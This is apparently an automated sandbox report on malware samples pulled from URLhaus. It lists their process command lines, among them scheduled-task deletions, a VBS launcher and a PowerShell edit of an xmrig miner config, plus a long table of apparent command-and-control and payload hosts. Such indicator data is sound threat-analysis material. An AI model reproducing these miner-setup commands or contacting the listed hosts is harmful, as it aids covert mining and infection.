C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Windows\SysWOW64\netbtugc.exe

"C:\Windows\SysWOW64\netbtugc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "Fix Getting Devices" /F

C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\iupdate.exe"

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\System32\ipconfig.exe" /flushdns

C:\Users\Admin\Downloads\UrlHausFiles\shell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\c3pool\\xmrig.log\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4f4 0x470

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "Windows Optimize" /F

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "ChangeWallpaper" /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.194.49:443 urlhaus.abuse.ch tcp
N/A 127.0.0.1:50804 tcp
US 8.8.8.8:53 49.194.101.151.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 nine.ddns.net udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 utorrent-backup-server4.top udp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
NL 45.200.148.45:443 tcp
NL 45.200.148.45:443 tcp
NL 45.200.148.45:443 tcp
CN 139.196.31.48:14417 tcp
CN 139.196.31.48:2324 tcp
JP 121.1.252.90:80 121.1.252.90 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 114.215.27.238:8100 tcp
CN 110.90.9.121:8072 tcp
CN 114.215.27.238:8072 tcp
CN 61.144.96.138:888 tcp
TR 5.26.97.52:88 5.26.97.52 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
CH 138.188.34.220:80 138.188.34.220 tcp
IN 111.118.250.244:80 111.118.250.244 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
TR 178.242.54.178:80 178.242.54.178 tcp
US 75.18.210.21:80 75.18.210.21 tcp
HK 219.77.72.53:80 219.77.72.53 tcp
BR 179.89.224.192:80 179.89.224.192 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
MO 202.175.60.117:80 202.175.60.117 tcp
FR 80.15.103.89:80 80.15.103.89 tcp
CN 112.27.225.72:8001 tcp
CN 110.40.250.173:2324 tcp
CN 113.85.101.199:81 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
KR 121.142.127.237:8605 121.142.127.237 tcp
CN 121.235.184.125:9000 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
TR 178.242.54.178:88 178.242.54.178 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
CN 49.81.40.231:111 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
CN 49.81.203.0:111 tcp
BR 189.61.50.98:8080 189.61.50.98 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
CN 47.103.126.166:8072 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
HK 149.88.73.206:80 149.88.73.206 tcp
US 141.155.36.213:41790 141.155.36.213 tcp
CA 184.145.33.5:80 184.145.33.5 tcp
CN 43.241.17.145:8899 tcp
KR 121.154.20.150:80 121.154.20.150 tcp
US 96.250.166.185:88 96.250.166.185 tcp
US 24.252.169.236:80 24.252.169.236 tcp
CA 76.67.131.51:80 76.67.131.51 tcp
MX 187.144.154.105:80 187.144.154.105 tcp
CA 76.68.62.152:80 76.68.62.152 tcp
CA 99.234.132.85:80 99.234.132.85 tcp
MX 187.225.233.208:80 187.225.233.208 tcp
KR 14.37.138.88:8602 14.37.138.88 tcp
CA 142.67.169.45:80 142.67.169.45 tcp
BE 109.137.108.215:8083 109.137.108.215 tcp
US 166.145.98.1:80 166.145.98.1 tcp
FR 109.210.138.197:80 109.210.138.197 tcp
TR 5.26.174.234:80 5.26.174.234 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 utorrent-backup-server2.top udp
TH 103.230.121.124:80 nine.ddns.net tcp
US 8.8.8.8:53 security-service-api-link.cc udp
TH 103.230.121.124:443 nine.ddns.net tcp
US 8.8.8.8:53 win-network-checker.cc udp
TH 103.230.121.124:443 nine.ddns.net tcp
TH 103.230.121.124:443 nine.ddns.net tcp
TH 103.230.121.124:443 nine.ddns.net tcp
US 8.8.8.8:53 utorrent-backup-server5.top udp
TH 103.230.121.124:443 nine.ddns.net tcp
TH 103.230.121.124:443 nine.ddns.net tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
SE 85.230.143.101:80 85.230.143.101 tcp
US 8.8.8.8:53 ns.smallsrv.com udp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
US 8.8.8.8:53 palharesinformatica.com.br udp
NL 4.180.120.64:8000 4.180.120.64 tcp
CN 139.198.15.223:8080 tcp
ES 94.76.156.101:280 94.76.156.101 tcp
LK 192.248.13.186:80 192.248.13.186 tcp
IN 122.170.110.131:9105 122.170.110.131 tcp
CN 36.138.125.70:8089 tcp
CN 101.126.11.168:80 tcp
CN 39.100.33.142:9092 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
CN 42.193.42.92:80 tcp
VN 103.77.173.146:80 103.77.173.146 tcp
RU 46.17.104.173:80 ns.smallsrv.com tcp
US 8.8.8.8:53 www.hseda.com udp
US 8.8.8.8:53 xinhgai.tv udp
US 8.8.8.8:53 23-122-210-174.lightspeed.cicril.sbcglobal.net udp
US 8.8.8.8:53 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev udp
US 8.8.8.8:53 cvinetwork.org udp
US 8.8.8.8:53 45.148.200.45.in-addr.arpa udp
US 8.8.8.8:53 89.103.15.80.in-addr.arpa udp
US 8.8.8.8:53 215.108.137.109.in-addr.arpa udp
US 8.8.8.8:53 197.138.210.109.in-addr.arpa udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 220.34.188.138.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 185.166.250.96.in-addr.arpa udp
US 8.8.8.8:53 213.36.155.141.in-addr.arpa udp
US 8.8.8.8:53 236.169.252.24.in-addr.arpa udp
US 8.8.8.8:53 51.131.67.76.in-addr.arpa udp
US 8.8.8.8:53 231.16.11.76.in-addr.arpa udp
US 8.8.8.8:53 152.62.68.76.in-addr.arpa udp
US 8.8.8.8:53 22.83.233.99.in-addr.arpa udp
US 8.8.8.8:53 5.33.145.184.in-addr.arpa udp
US 8.8.8.8:53 85.132.234.99.in-addr.arpa udp
US 8.8.8.8:53 234.174.26.5.in-addr.arpa udp
US 8.8.8.8:53 45.169.67.142.in-addr.arpa udp
US 8.8.8.8:53 69.47.190.67.in-addr.arpa udp
US 8.8.8.8:53 1.153.59.68.in-addr.arpa udp
US 8.8.8.8:53 178.54.242.178.in-addr.arpa udp
US 8.8.8.8:53 151.122.250.159.in-addr.arpa udp
US 8.8.8.8:53 21.210.18.75.in-addr.arpa udp
US 8.8.8.8:53 105.154.144.187.in-addr.arpa udp
US 8.8.8.8:53 1.98.145.166.in-addr.arpa udp
US 8.8.8.8:53 244.250.118.111.in-addr.arpa udp
US 8.8.8.8:53 16.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 101.143.230.85.in-addr.arpa udp
US 8.8.8.8:53 208.233.225.187.in-addr.arpa udp
US 8.8.8.8:53 64.120.180.4.in-addr.arpa udp
US 8.8.8.8:53 98.50.61.189.in-addr.arpa udp
US 8.8.8.8:53 192.224.89.179.in-addr.arpa udp
US 8.8.8.8:53 53.72.77.219.in-addr.arpa udp
US 8.8.8.8:53 238.102.59.187.in-addr.arpa udp
US 8.8.8.8:53 90.252.1.121.in-addr.arpa udp
US 8.8.8.8:53 101.156.76.94.in-addr.arpa udp
US 8.8.8.8:53 117.60.175.202.in-addr.arpa udp
US 8.8.8.8:53 194.48.233.193.in-addr.arpa udp
US 8.8.8.8:53 101.166.31.122.in-addr.arpa udp
US 8.8.8.8:53 150.20.154.121.in-addr.arpa udp
US 8.8.8.8:53 88.138.37.14.in-addr.arpa udp
US 8.8.8.8:53 173.104.17.46.in-addr.arpa udp
US 8.8.8.8:53 6.74.155.218.in-addr.arpa udp
US 8.8.8.8:53 237.127.142.121.in-addr.arpa udp
US 8.8.8.8:53 206.73.88.149.in-addr.arpa udp
US 8.8.8.8:53 186.13.248.192.in-addr.arpa udp
US 8.8.8.8:53 124.121.230.103.in-addr.arpa udp
US 8.8.8.8:53 131.110.170.122.in-addr.arpa udp
US 8.8.8.8:53 146.173.77.103.in-addr.arpa udp
US 8.8.8.8:53 www.saf-oil.ru udp
US 8.8.8.8:53 52.97.26.5.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
CN 211.149.230.178:80 www.hseda.com tcp
VN 103.216.119.164:80 xinhgai.tv tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
US 172.66.0.235:443 pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
US 23.122.210.174:80 23-122-210-174.lightspeed.cicril.sbcglobal.net tcp
US 50.31.188.149:443 cvinetwork.org tcp
BR 186.225.153.226:443 palharesinformatica.com.br tcp
US 8.8.8.8:53 eoufaoeuhoauengi.su udp
RU 87.236.16.222:443 www.saf-oil.ru tcp
GB 165.220.134.146:80 165.220.134.146 tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
US 8.8.8.8:53 235.0.66.172.in-addr.arpa udp
US 8.8.8.8:53 222.16.236.87.in-addr.arpa udp
US 8.8.8.8:53 149.188.31.50.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 174.210.122.23.in-addr.arpa udp
US 8.8.8.8:53 226.153.225.186.in-addr.arpa udp
US 8.8.8.8:53 164.119.216.103.in-addr.arpa udp
US 67.213.59.251:80 67.213.59.251 tcp
US 8.8.8.8:53 a15aaa1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 utorrent-backup-server.top udp
US 8.8.8.8:53 soft.110route.com udp
US 8.8.8.8:53 146.134.220.165.in-addr.arpa udp
CN 47.98.177.117:8888 tcp
CN 49.232.126.36:9000 tcp
KR 112.217.207.130:80 112.217.207.130 tcp
US 8.8.8.8:53 ftp.ywxww.net udp
US 8.8.8.8:53 251.59.213.67.in-addr.arpa udp
US 8.8.8.8:53 130.207.217.112.in-addr.arpa udp
NL 194.15.46.189:80 194.15.46.189 tcp
CN 112.27.189.32:8090 tcp
US 8.8.8.8:53 189.46.15.194.in-addr.arpa udp
HK 47.79.66.210:80 a15aaa1.oss-cn-hongkong.aliyuncs.com tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
CN 39.106.158.243:80 soft.110route.com tcp
US 8.8.8.8:53 cfs10.blog.daum.net udp
US 8.8.8.8:53 210.66.79.47.in-addr.arpa udp
SE 94.255.218.185:80 94.255.218.185 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 kotov.lol udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 185.218.255.94.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 137.8.203.116.in-addr.arpa udp
CN 60.191.208.187:820 ftp.ywxww.net tcp
KR 203.232.37.151:80 203.232.37.151 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 tail-cease.cyou udp
US 104.21.93.105:443 tail-cease.cyou tcp
US 8.8.8.8:53 plastic-mitten.sbs udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 looky-marked.sbs udp
US 8.8.8.8:53 wrench-creter.sbs udp
US 104.243.129.2:80 104.243.129.2 tcp
BR 187.115.56.93:80 187.115.56.93 tcp
TW 203.204.217.190:8080 203.204.217.190 tcp
US 8.8.8.8:53 pid.fly160.com udp
US 8.8.8.8:53 slam-whipp.sbs udp
US 8.8.8.8:53 record-envyp.sbs udp
TH 58.9.110.23:18063 tcp
US 8.8.8.8:53 copper-replace.sbs udp
US 8.8.8.8:53 savvy-steereo.sbs udp
US 8.8.8.8:53 preside-comforter.sbs udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 151.37.232.203.in-addr.arpa udp
US 8.8.8.8:53 105.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 2.129.243.104.in-addr.arpa udp
US 8.8.8.8:53 93.56.115.187.in-addr.arpa udp
US 8.8.8.8:53 190.217.204.203.in-addr.arpa udp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
KR 121.53.85.3:80 cfs10.blog.daum.net tcp
US 8.8.8.8:53 by.haory.cn udp
US 8.8.8.8:53 marshal-zhukov.com udp
US 172.67.160.80:443 marshal-zhukov.com tcp
US 8.8.8.8:53 80.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.85.53.121.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
DE 116.203.8.137:443 kotov.lol tcp
DE 217.92.214.15:8088 217.92.214.15 tcp
CN 182.92.0.5:80 pid.fly160.com tcp
CN 39.108.237.194:80 tcp
KR 1.214.192.147:80 1.214.192.147 tcp
CN 101.226.27.118:80 by.haory.cn tcp
US 209.141.35.225:80 209.141.35.225 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 mohibkal.publicvm.com udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 8.8.8.8:53 15.214.92.217.in-addr.arpa udp
US 8.8.8.8:53 225.35.141.209.in-addr.arpa udp
US 8.8.8.8:53 147.192.214.1.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 ser.nrovn.xyz udp
VN 103.77.173.146:7707 ser.nrovn.xyz tcp
US 8.8.8.8:53 mininews.kpzip.com udp
US 38.114.122.39:443 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
CN 150.158.25.244:9000 tcp
US 8.8.8.8:53 39.122.114.38.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 cd.textfiles.com udp
US 8.8.8.8:53 www.aqianniao.com udp
US 8.8.8.8:53 172-105-66-118.ip.linodeusercontent.com udp
US 8.8.8.8:53 down10d.zol.com.cn udp
US 8.8.8.8:53 tianyinsoft.top udp
RU 176.111.174.138:8000 176.111.174.138 tcp
US 8.8.8.8:53 www.xn--on3b15m2lco2u.com udp
CN 202.107.235.202:8088 tcp
US 8.8.8.8:53 dow.andylab.cn udp
US 8.8.8.8:53 tengfeidn.com udp
US 8.8.8.8:53 138.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 softbank126023203236.bbtec.net udp
VN 103.173.254.78:80 103.173.254.78 tcp
CN 211.97.92.167:80 mininews.kpzip.com tcp
CN 110.40.51.56:5700 tcp
CN 47.120.46.210:80 tcp
CN 58.215.245.2:9000 tcp
CN 106.42.31.65:8088 tcp
RU 92.127.156.174:8880 92.127.156.174 tcp
KR 218.147.147.172:80 tcp
CN 119.32.29.121:8309 tcp
VN 103.167.89.125:80 103.167.89.125 tcp
CZ 77.240.97.71:81 77.240.97.71 tcp
CL 190.215.253.57:80 190.215.253.57 tcp
US 166.150.43.236:80 166.150.43.236 tcp
CN 47.104.169.91:80 tcp
CN 113.106.6.106:14319 tcp
VN 113.160.249.9:80 113.160.249.9 tcp
CN 47.104.173.216:8082 tcp
IN 43.240.65.55:81 43.240.65.55 tcp
CN 180.167.115.186:8011 tcp
US 144.34.162.13:80 144.34.162.13 tcp
US 8.8.8.8:53 a23uuu1.oss-cn-hongkong.aliyuncs.com udp
KW 178.61.160.6:5001 178.61.160.6 tcp
US 8.8.8.8:53 71.97.240.77.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
HK 47.79.66.210:443 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
US 208.86.224.90:80 cd.textfiles.com tcp
DE 172.105.66.118:80 172-105-66-118.ip.linodeusercontent.com tcp
CN 139.9.248.128:80 tianyinsoft.top tcp
JP 126.23.203.236:80 softbank126023203236.bbtec.net tcp
CN 122.143.2.98:80 down10d.zol.com.cn tcp
CN 116.142.249.98:80 dow.andylab.cn tcp
CN 139.196.217.38:80 tengfeidn.com tcp
CN 113.219.142.35:80 www.aqianniao.com tcp
KR 221.139.49.8:80 www.xn--on3b15m2lco2u.com tcp
US 8.8.8.8:53 174.156.127.92.in-addr.arpa udp
US 8.8.8.8:53 55.65.240.43.in-addr.arpa udp
US 8.8.8.8:53 236.43.150.166.in-addr.arpa udp
US 8.8.8.8:53 6.160.61.178.in-addr.arpa udp
US 8.8.8.8:53 13.162.34.144.in-addr.arpa udp
US 8.8.8.8:53 57.253.215.190.in-addr.arpa udp
US 8.8.8.8:53 78.254.173.103.in-addr.arpa udp
US 8.8.8.8:53 9.249.160.113.in-addr.arpa udp
US 8.8.8.8:53 125.89.167.103.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
US 206.217.142.166:1234 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 236.203.23.126.in-addr.arpa udp
US 8.8.8.8:53 41.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 static.trafficjunky.com udp
US 8.8.8.8:53 ei.phncdn.com udp
DE 116.203.8.137:443 kotov.lol tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
GB 64.210.156.16:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
GB 64.210.156.17:443 ei.phncdn.com tcp
US 8.8.8.8:53 cdn1-smallimg.phncdn.com udp
US 8.8.8.8:53 media.trafficjunky.net udp
US 66.254.114.156:443 cdn1-smallimg.phncdn.com tcp
GB 64.210.156.19:443 media.trafficjunky.net tcp
US 8.8.8.8:53 118.66.105.172.in-addr.arpa udp
US 8.8.8.8:53 90.224.86.208.in-addr.arpa udp
US 8.8.8.8:53 16.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 17.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 156.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 40.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 19.156.210.64.in-addr.arpa udp
GB 64.210.156.17:443 media.trafficjunky.net tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 ss.phncdn.com udp
US 8.8.8.8:53 a.adtng.com udp
US 66.254.114.171:443 a.adtng.com tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 66.254.114.171:443 a.adtng.com tcp
CN 8.138.81.152:5555 tcp
HK 154.12.82.11:808 154.12.82.11 tcp
US 8.8.8.8:53 www.zhikey.com udp
US 8.8.8.8:53 171.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 ht-cdn2.adtng.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 hw-cdn2.adtng.com udp
GB 64.210.156.5:443 hw-cdn2.adtng.com tcp
US 8.8.8.8:53 storage.googleapis.com udp
GB 142.250.180.27:443 storage.googleapis.com tcp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 20.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 11.82.12.154.in-addr.arpa udp
US 8.8.8.8:53 5.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 27.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
HK 47.79.66.210:80 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
ES 47.62.190.226:8081 47.62.190.226 tcp
HK 43.132.12.146:9000 43.132.12.146 tcp
US 8.8.8.8:53 paonancs.cn udp
US 8.8.8.8:53 226.190.62.47.in-addr.arpa udp
US 8.8.8.8:53 146.12.132.43.in-addr.arpa udp
CN 121.43.104.75:8080 tcp
N/A 127.0.0.1:9223 tcp
TH 58.9.110.23:18063 tcp
CN 180.140.124.53:60 tcp
CN 61.131.3.86:9991 tcp
US 8.8.8.8:53 adf6.adf6.com udp
US 8.8.8.8:53 download.innovare.no udp
US 8.8.8.8:53 down.mvip8.ru udp
US 104.21.8.89:443 down.mvip8.ru tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 89.8.21.104.in-addr.arpa udp
GB 142.250.200.3:80 c.pki.goog tcp
CN 39.100.254.136:80 www.zhikey.com tcp
US 66.254.114.41:443 www.pornhub.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
RU 87.251.102.94:80 87.251.102.94 tcp
US 206.217.142.166:1234 tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
GB 64.210.156.17:443 ht-cdn2.adtng.com tcp
US 66.254.114.171:443 a.adtng.com tcp
US 66.254.114.171:443 a.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
GB 64.210.156.20:443 ht-cdn2.adtng.com tcp
ID 103.123.98.86:8082 103.123.98.86 tcp
GB 89.197.154.115:80 89.197.154.115 tcp
US 8.8.8.8:53 94.102.251.87.in-addr.arpa udp
US 8.8.8.8:53 115.154.197.89.in-addr.arpa udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
GB 142.250.180.27:443 storage.googleapis.com tcp
DE 116.203.8.137:443 kotov.lol tcp
DE 172.105.66.118:8080 172-105-66-118.ip.linodeusercontent.com tcp
GB 20.26.156.215:80 github.com tcp
HK 8.210.218.210:80 paonancs.cn tcp
US 8.8.8.8:53 stdown.dinju.com udp
US 8.8.8.8:53 klfs.synology.me udp
CN 101.226.27.117:80 by.haory.cn tcp
US 8.8.8.8:53 86.98.123.103.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 sfa.com.ar udp
KR 27.102.130.169:801 27.102.130.169 tcp
IN 116.206.151.203:478 116.206.151.203 tcp
HK 43.132.13.252:9000 43.132.13.252 tcp
RU 176.113.115.33:80 176.113.115.33 tcp
US 8.8.8.8:53 210.218.210.8.in-addr.arpa udp
US 154.216.20.237:80 154.216.20.237 tcp
RU 185.215.113.205:8080 185.215.113.205 tcp
NO 217.149.124.92:80 download.innovare.no tcp
US 104.21.67.89:80 adf6.adf6.com tcp
US 8.8.8.8:53 a19ccc1.oss-cn-hongkong.aliyuncs.com udp
CN 47.104.173.216:9876 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
IT 95.255.114.11:80 95.255.114.11 tcp
US 8.8.8.8:53 203.151.206.116.in-addr.arpa udp
US 8.8.8.8:53 33.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 169.130.102.27.in-addr.arpa udp
US 8.8.8.8:53 252.13.132.43.in-addr.arpa udp
US 8.8.8.8:53 237.20.216.154.in-addr.arpa udp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 89.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 92.124.149.217.in-addr.arpa udp
US 8.8.8.8:53 205.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
US 8.8.8.8:53 11.114.255.95.in-addr.arpa udp
CN 120.41.69.75:9096 klfs.synology.me tcp
CN 61.240.220.214:80 stdown.dinju.com tcp
US 216.239.32.36:443 region1.google-analytics.com udp
DE 116.203.8.137:443 kotov.lol tcp
US 190.61.250.130:80 sfa.com.ar tcp
RU 176.111.174.140:443 tcp
CN 113.201.158.118:80 mininews.kpzip.com tcp
US 8.8.8.8:53 dcwblida.dz udp
US 8.8.8.8:53 filelu.com udp
US 104.26.12.42:443 filelu.com tcp
US 8.8.8.8:53 130.250.61.190.in-addr.arpa udp
US 8.8.8.8:53 140.174.111.176.in-addr.arpa udp
US 8.8.8.8:53 42.12.26.104.in-addr.arpa udp
VN 103.77.173.146:6606 ser.nrovn.xyz tcp
VN 14.243.221.170:2654 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.212.227:443 update.googleapis.com tcp
GB 216.58.212.227:443 update.googleapis.com tcp
US 8.8.8.8:53 alien-training.com udp
US 8.8.8.8:53 pb.agnt.ru udp
US 8.8.8.8:53 bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link udp
CN 42.56.81.104:80 stdown.dinju.com tcp
HK 47.79.66.211:443 a19ccc1.oss-cn-hongkong.aliyuncs.com tcp
US 8.8.8.8:53 3434.filelu.cloud udp
US 8.8.8.8:53 quanlyphongnet.com udp
VN 103.216.119.164:80 quanlyphongnet.com tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.200.3:80 o.pki.goog tcp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 211.66.79.47.in-addr.arpa udp
HK 219.73.22.64:8084 219.73.22.64 tcp
DE 116.203.8.137:443 kotov.lol tcp
US 8.8.8.8:53 28.237.23.67.in-addr.arpa udp
US 8.8.8.8:53 123.35.104.34.in-addr.arpa udp
US 8.8.8.8:53 64.22.73.219.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
CN 101.35.228.105:8888 tcp
NL 83.87.76.41:80 83.87.76.41 tcp
